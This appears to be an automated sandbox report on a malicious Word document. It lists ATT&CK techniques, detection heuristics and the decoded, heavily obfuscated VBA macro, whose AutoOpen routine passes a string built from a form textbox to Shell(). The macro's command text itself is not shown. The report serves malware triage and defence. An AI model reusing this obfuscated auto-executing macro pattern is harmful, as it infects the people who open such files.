Verdict: MALICIOUS
Risk score: 292

Malware Insights
MITRE ATT&CK

- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the Shell() function, indicating an attempt to execute arbitrary code. Heuristics also indicate references to PowerShell and cmd.exe, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection 'Doc.Malware.Sonbokli-6786376-0' further confirms its malicious nature.
Heuristics (10)

- ClamAV: Doc.Malware.Sonbokli-6786376-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sonbokli-6786376-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched lines in script: `Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP`, `otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)`, `Select Case zkbUQkjGbBDiVRYfMOI`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"`, `Sub autoopen()`, `GiIvHcf`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.iec.ch (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9931 bytes |

SHA-256: a15e8c34622087857b9938c39724f15199ccadab7275178c6b9f6a986519dfd0

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 265 of 308 identifiers look randomly generated (e.g. 'IDERijbrjplIvitQQCLbjqwH'), consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "AiliVFBnpQBWf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
GiIvHcf
End Sub
Attribute VB_Name = "jCrccuGihAQA"
Function GiIvHcf()
On Error Resume Next
Select Case uiBizvUWjWiYSNqvNtF
Case 211762241
ZvlSHSObvElzChPUMvBiqXlm = fTOcpoozZUnPPpcFunRtZQfa
AzDBHBJzVczAzFQzBdM = Log(EwFYYvkTsYPnnAoqkwR)
dQtNdFuhBwXmTzWEsi = 189480325
RpGzNLMwRZMFLtzo = svTBCSwAcUoikz
Case 39275106
FBoJwzSswQbkRbZBiB = 341471985
JKPXKwlqYUhcGmFrJiGsc = Log(EmqMiAvnwjwWJvmRzzO)
UbjzdfVhrDuHGiFdjwN = 238092348
kYzikcKFsiGiBFdCqiDiNvso = Log(PbpIkBlijjDlVtCLbzYncFc)
End Select
Set apPKFipjInUBVzHdVzUW = RVpATlvTBOJwMiumbZz
Select Case tRMziBszBzUfDqRSVZtRtJ
Case 327569417
oljBGZGbAUuUQmKj = YYQYRYoNGptiUzkT
JtSqsbqtfiwwBiPJEUkhnWMu = Log(zkNsfXKBQdQRWjwZimpsQE)
iYPczmLnjXCsrdA = 338269233
lvkFwsionHJjWBXv = jUQuKPEqjtTnEwiniGVU
Case 6686848
fhoLiCDKVfzNujjQbjfO = 94362220
OBiKivrvBacCpjGwkBmZXopr = Log(wEOfpomRfSndUY)
SaiWkrqzJcvdcoc = 174944361
rIjrdQMmqlJQSVQd = Log(HwJSGKHEECtKKdCsclLr)
End Select
Set oKRktGjjrHfzzjjQs = zZnYNSbjHHYqjEmOSlsiM
Select Case IZZLRnBBKVJOwhQdEYCNfBU
Case 226235697
KJppoZolLApofcnW = rTcCAvqaTJhLMHErBGi
LVvVcnjapYwPrEJA = Log(HKNzOVPGawskwdV)
LOVXHZNOQkuNRTH = 326687805
ltwQLzAjOCoopt = aGjqodwiwwiiaBoGrvhLjYs
Case 337374978
UrsXZaarzmLnRJanL = 1678958
cSaiavztIhLBOhYTm = Log(KXYInaPdTZlGXYY)
WwuMScbhSJokwGspohA = 189700483
UfzPwbXHBKndnKaYZnivrqd = Log(ijNhwSpXvhBTvwVADaQzAH)
End Select
Set vSROuShCiCMlQOq = jUQhGJHccRirQZim
Select Case CYbWSLGdvrtmpNsolrw
Case 81896631
fkZmwIwvQSqdIui = TCZvKziFTLwUiCG
VWXoCjUCJhfYDIjTKjRo = Log(QuiCTSmMcNOMKIlWtFj)
XmcSJCKicJCkRHEbpmjRh = 280516889
URLsAuwQbiGBiSPsQHHj = KdvDDKhHWSBjFHBzK
Case 68298671
jtbBLGaJZtSJZHOKnQpwk = 96834096
FQEUYKOuGzXDZjb = Log(zdAIOEIbZrzOhVNzRkWlG)
BzLwLLCDobLjrTjGuBHdv = 220835322
ANljYlpNpdLcBzPs = Log(ZVCVCBduPLpVicqTmKlZciRz)
End Select
Set VCjqiJfIKEZfrzMIo = azsKAUIPmiTUvDC
Const DwNpiWpA = 0
Select Case lVwlVOfIYfPvML
Case 312551555
FCuRJrUZHOwzvmHj = ZzvQZPMtiHKMIHI
uwfivtuAXiHQiMlXjnnN = Log(tjniYbkJNzHqTBqcENfDvtuI)
LVVnjVTuiBPrwWSKqKfzZOKv = 305664991
ZHKEAlimMFOWjinvoAa = IqNtEjPIWwLatFvMjZAdN
Case 67441472
MvUdBMiaKUJTitRA = 111466308
WQPuodbibLOzzXzjAz = Log(FOwrWAGjmMSSZjHquuSHq)
SkSLLWlVCsTQLH = 170518531
tuhtpVItpPqhDliqtCw = Log(ZLojwRKZwJYzQWBY)
End Select
Set wNwcZWvjERQKdXILOwh = wvYLjufrqQhkKQw
Select Case rptbBCRRihSiai
Case 60944573
XnkDstXtTwXfwqddki = iznlLKQHoOjXnUirqAoKzS
IFflVoEozrqiXj = Log(YscmifkYjLRzmc)
XrMzfjfZuSkZlfzpHHobwiLk = 138290136
jvaDpRMBUzSXDWsThTz = wtmVKrwAzpfciHA
Case 238460256
qdSNjLzXjERjcArmPZnJEtzT = 76948995
iTqtwVIUqqfsPh = Log(wbnjRWoopPhNbuzfzBhjih)
IwaIJBGXKFUGRKmufqfAdO = 56865580
ZtKfqiBKQkfkrNfmjsXHG = Log(fVMHBqzhMtnsjQrajcEJpj)
End Select
Set CCSKsRlqAalNoTjhKLjY = zwiPvILvDwwwqKEifGPaD
Select Case vzNqVzoNGQNPHLvbXZbGjz
Case 113748171
ZFwdmZZPHYfUwpbtYh = IDERijbrjplIvitQQCLbjqwH
fbchzhizDJQUnOwKipZWQ = Log(lEYLqMFPREwjCEwJlICIs)
dwdoOQzAZlSvpYJmqVu = 263425614
MYDLsLZEQTIrMbchCwoRRiK = HOazzRhOEiRXZdVEY
Case 317662200
RJDdzhFoXFWZhNm = 25750100
lZEwmuniJEHZcktVVtHD = Log(dStdKIiIjKmZsTwrKiPQw)
cwOuVcDMUfArIGLVclFVau = 135286722
kQuiKOrnnppvPP = Log(FEXpHYAKrfpCiKdNidOKEi)
End Select
Set BFnMESRPFNzzQCENbjG = wVLNcKcHSBFjXf
Select Case ujKHAHpoLmDwRwOtmKKuYHiC
Case 52461296
unfuZBCfDvuMzaVr = ZqBwDuEFflLbnAHzoN
IQNCwmtTzZMkYj = Log(JMGOqsaotPrEPunNINUjEM)
FKKaFjSBmuBrutaWIibTmE = 226726014
ZMMEWEzhzYAEfSUIbNEJ = CsUirLAcsBAbhBtTO
Case 205701779
zUuVsVqqNTsYAYOXTsVis = 322251076
EXzcwQboMiWMtH = Log(bNBVmJzcACTdZbsApA)
pwtssZmifqiMUPzRI = 195846377
KuFuzaimBNUijMdSXh = Log(IvAiTmVqwOcJkWSqVk)
End Select
Set uSNmlQLHwArzZj = UbJQlHdjjYYEkLOWHhTnCv
Select Case YlDWTLoHGrjnlMoihiaR
Case 71876279
tBvtSiDHYAchwEwMDK = GpKRtzbXoTODsRCrBbZt
EwSiKEOjjViPnDh = Log(jBwrKOnKwkQwMwldRYCqr)
jtMnEwjnFNUJSZdCvpLIm = 173795293
SWnkAwOBqqARDiWKpaIiCb = iLAPdMijwJFuRR
Case 92173373
prMiSSHaXYfWidwlrTIYA = 228422692
oMHDIzjFsbrTmqzkMDZrE = Log(IATMTDwIpiGGXRLOwcnSm)
rKJutiwVaqjGDHkvijHjmIM = 216434472
fZzEzDluNJIDYJPMT = Log(PZQODdCwHLDIizc)
End Select
Set OIwQdnvMpzbsFWrXSAw = BQVUBwwarFbLbwu
FJiHDJoBvaI = AiliVFBnpQBWf.TextBox1 + iciEZ + KtlTf + SrFKGM + PVTdz + UUkWQQIb + BUawmiO + JGWwUjoA + GXLXZjN + iUbLi + jpjlu + cHJmiQ
Select Case GjuaofTcPWMGpQjUlpIpkd
Case 185276828
dYAidFWwcuAUNX = XtMCptkWviKLqj
EcEuzQfozJAQivPO = Log(NolwYbmHsBFATtf)
QqYPTaksFMtpcFbjP = 20969943
CvPfBSmEOZnfPVAOErwnnEsq = hwinZZlQvcUALWzj
Case 141964255
SSjiUcrXpQQLwCZTTV = 54732018
pABPTsfOtUBGRiaXi = Log(cBwCjVAkiSarCb)
EjRRRKczcdUPJtPbCoQ = 298824932
VmQjPiNNoBSZhNC = Log(FNtAETYPGqrPqXD)
End Select
Set iRitAlBbOkocCpcfMSwaWt = BOBaZrwWQwfrPi
Select Case soTDKucXliYCMWWFznsaril
Case 39353978
pVaFKmNwpFpzppuYzdWScOi = kTtAECODNLUYBSa
LEXQjFHzwCrAPnPbnSUrtMtm = Log(mmiVVXhCaHYqScfLvCCKOoZ)
tljzjCwKkZtTdccfKzofrkUq = 272859816
zKrbcwMibknjTYJNFsiL = SaWAQzuEIRsICEoTJzvGu
Case 6284503
radQWdfcIdzfjUbLwSiTTub = 111568322
UuwvmFnRifZniXadok = Log(FYEwhlwoQhZwzMwBiijV)
KNBpBYQuDqiJzLuQwOK = 273058841
WkJiaalWruIPGvKDI = Log(MjtNqumCBClmTWjHndsH)
End Select
Set wiYLvWuqQkMnizIWJtO = YZjkFbliwIhKBEOBVBuYrLkR
Select Case liQqczZjMqJlPNriiJuElFi
Case 48292880
fzoPaROVmcwHoSY = QpDjtwDJHGqBWHfAI
wCkTmZvPdkuatrVmVPaXP = Log(tiHTbMziwwwGVWhzDiodU)
PhMwfkmQZkSOJFLSzi = 107815517
nwbnVzEXMwjlMaPaGchOsjWN = GMbmkjGNWfRFZdfjODdBjC
Case 229833539
kMVBBFHbOwOmclcPcYqvwV = 218895407
BiictMIEdlBXKFLQYpraOsDd = Log(NYHLnsOiWzSbiiBqKJr)
EEXMaXIiGkIfABfnAtqtn = 296723620
FtotHpkEjMuWIAvlQjkYmr = Log(bcCOqQTwwLQSTldBpWfYTG)
End Select
Set XmEHZJCUBNGNQEaunQNz = ricAnhuCGSUUwfcl
Select Case jwzpVQCAzdJKkhXG
Case 46771868
rSBKwNzOJijKNLAQD = OiIFvMDaARdXjcPAw
JVwlpGGTTmPwJUdEsYImWpG = Log(NhlmwEvNPJGhUctCwct)
KBIJtfjrrJUUPZXIV = 135102298
OqCjzNwkPfGnuvoNMZ = sTUEVFolSuFkjiGiaHS
Case 60937234
zvULkWaYaMLjucCtmhdKcdpK = 305824814
JnROGtPjuYAskiOMrit = Log(lCEkoaowTUFKRK)
mHMFRTOhdttwvvPl = 48367220
soHijZfFQMaSqbaVb = Log(fcciXUaruitCEiz)
End Select
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
Select Case zkbUQkjGbBDiVRYfMOI
Case 213553833
MjWLVLlZwwPbYOoBAoZiIRa = jZDvqjUCOjnDFIuZzhdEoGwC
dLaizkvGXfvIqjObMNrbl = Log(rtAkaoVKadAMMYtUQwrzhdwQ)
wOcctFbwhThiNJG = 238962951
ESIiWqhswvjnOOuj = cathjXYNfEMlDmlMUYjI
Case 194425028
XvkzJsKSFnzkhjrjYuj = 110884928
mVGsJwaupOazBCzzjOjCMzY = Log(SEEVoAlZMklZiEAtkYPZYl)
itiojCOimwTaEtFGodAm = 111869160
YTfNmSojzNhYZcFME = Log(wFwcKdwAfSbwYwPNUP)
End Select
Set TPwqDzGsfTcAcYd = LSwIBQmnWIDpiJMHpDkHCP
Select Case FRjiwhfsuzlmbuYhGYj
Case 165473779
HYHBqDWYPlNWlQqlcdG = tBXfSoEiCwlwVAwtchFiIUf
YPqiiwivdiiFAbjCw = Log(VRzQBkRzJuYbhYWJHCwazG)
qTmVssAwDfVwOOHOFM = 243232673
jXBAFjrTjDYoPzJzOPZFIw = vMaHuAosNOTkSRmPIA
Case 215693894
zHjjREKzqnfimCFnf = 184445548
TsLLZvMqfczQEbfVofqqqppC = Log(iowQLwjjDMZowHoENiW)
XbDHjRIplHdDIlqHNaTiPjA = 96688268
hrYClcLSMCHlqkt = Log(uvwiWfKRhrnKranaoBwajn)
End Select
Set iSkwjjVXpZoVoEfjCjHUuoAa = PjwomTGGvRQlibiLTwlDF
Select Case vfUpGjtUcoEJdzDmfDrlL
Case 79390792
FbBKSVvztWpvjCqKauBO = ZiNcuosEnBZjzPOEYbwjqK
oDTkotRqKzsjzohYjDsFVP = Log(kmbFCTCivOrYZaED)
WKPlGjRPqDSdwFQZ = 282489848
zNnPXHPzRFQIzczhiKzad = KpLQkEzIaziqHq
Case 154770044
nIWJRMziFpdRXGZ = 106030876
uCwDGWKAJiQZGVI = Log(bXqETmwpcKuajlUZ)
kNoZDjlLJHhiIwUVH = 316186135
iLmHEIawbjTYJrHVIUkXq = Log(sKiQHULaFZpmqGw)
End Select
Set jRdkKcpjXrBdMBW = rdTbdnBGkBiuiXAAWDk
Select Case TwJSozjKPHBZhHhw
Case 324122818
XvUJjnaDwHBqTlUUlBsIYhfh = kfKpZFYcDEVrJPWs
zYJZoPFNWfGpXpPnzwIPN = Log(CcNPhzcblVPniHXnwPE)
CZRnjPFDMTOdWaVjLZi = 40075943
vtlZjHIPKzsKmWdLaiRtY = SHmQHlrbWhwqHfjOw
Case 53767800
nCTVSkEsVlqQMMjbdnSzXYid = 71002413
vPwiMlJwkNwlTjDt = Log(qfQmdaDCadJZPTqLGo)
tqYFGPcTdsTmviCrztZSou = 184323825
HAWVtIaNrPzfRaJWBHaKH = Log(NvMcsRjWAzOnzGtHZURFvff)
End Select
Set ZXjDRjTRiQmaIRPJjU = zRicDduiFsBvhQpCV
End Function
```